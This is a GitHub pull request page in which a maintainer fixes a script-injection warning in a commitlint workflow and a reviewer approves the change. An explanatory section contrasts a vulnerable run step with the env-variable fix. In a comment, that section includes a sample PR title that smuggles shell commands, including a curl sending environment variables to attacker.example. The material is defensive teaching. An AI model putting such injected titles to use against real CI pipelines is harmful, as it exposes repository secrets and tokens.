
chore: fixed the Dangerous-Workflow #578

Merged: 1 commit merged into defenseunicorns:main on Feb 15, 2024

Conversation

@naveensrinivasan (Member) commented Feb 15, 2024

Description

Fixed the dangerous workflow
Warn: script injection with untrusted input ' github.event.pull_request.title ': .github/workflows/commitlint.yml:28

https://securityscorecards.dev/viewer/?uri=github.com/defenseunicorns/pepr
https://securitylab.github.com/research/github-actions-preventing-pwn-requests/
https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#understanding-the-risk-of-script-injections
...

Related Issue

Fixes #

Relates to #

Type of change

  • Bug fix (non-breaking change which fixes an issue)
  • New feature (non-breaking change which adds functionality)
  • Other (security config, docs update, etc)

Checklist before merging

Fixed the dangerous workflow
Warn: script injection with untrusted input ' github.event.pull_request.title ': .github/workflows/commitlint.yml:28

https://securityscorecards.dev/viewer/?uri=github.com/defenseunicorns/pepr

Signed-off-by: naveensrinivasan <172697+naveensrinivasan@users.noreply.github.com>
@naveensrinivasan naveensrinivasan changed the title Fixed the Dangerous-Workflow chore: Fixed the Dangerous-Workflow Feb 15, 2024
@naveensrinivasan naveensrinivasan changed the title chore: Fixed the Dangerous-Workflow chore: fixed the Dangerous-Workflow Feb 15, 2024
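The bug class behind the Scorecard warning, as an added illustration rather than the PR's own diff: the real .github/workflows/commitlint.yml is not reproduced on this page, so the step below is a hypothetical reconstruction of the pattern Dangerous-Workflow flags (an expression such as `github.event.pull_request.title` expanded directly inside a `run:` script) next to the hardened form that GitHub's hardening guide linked above recommends. The job and step names, the commitlint invocation and the sample malicious title are all assumptions.

```yaml
# Added example, not the project's workflow. The exact contents of
# .github/workflows/commitlint.yml are not shown on this page; this is a
# hypothetical step of the kind Scorecard's Dangerous-Workflow check warns on.
name: commitlint

on:
  pull_request:
    types: [opened, edited, synchronize]

jobs:
  lint-title:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      # VULNERABLE: ${{ ... }} is expanded by the runner into the script text
      # before bash ever parses it, so the title is code, not data. A PR title
      # such as (constructed example)
      #   feat: x"; id; curl https://attacker.example/ -d "$(env)"; echo "
      # closes the quote and runs attacker-chosen commands on the runner with
      # whatever the job's environment and token allow.
      - name: Lint PR title (unsafe)
        run: |
          echo "${{ github.event.pull_request.title }}" | npx commitlint

      # FIXED: bind the untrusted value to an environment variable. The runner
      # passes it through the process environment, and bash treats $PR_TITLE
      # purely as a string; double-quoting keeps word splitting and globbing
      # from applying to it.
      - name: Lint PR title (safe)
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: |
          echo "$PR_TITLE" | npx commitlint
```

The same rule applies to every other attacker-controlled field that can appear in a `run:` block (PR body, head ref, issue title and body, commit messages, review comments): never interpolate it with `${{ }}` into shell text, always route it through `env:` and reference the variable from the script. Re-running Scorecard against the repository (the viewer link above) is the check that the warning has actually cleared.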
@btlghrants (Collaborator) left a comment


Had to go digging for an explanation of the fix (here) and it was quite illuminating.

Nice find -- thx for the PR!

@btlghrants btlghrants merged commit f1cfbd5 into defenseunicorns:main Feb 15, 2024
8 of 15 checks passed
@naveensrinivasan naveensrinivasan deleted the naveen/scorecard branch February 16, 2024 15:47
cmwylie19 pushed a commit to defenseunicorns/kubernetes-fluent-client that referenced this pull request Apr 8, 2024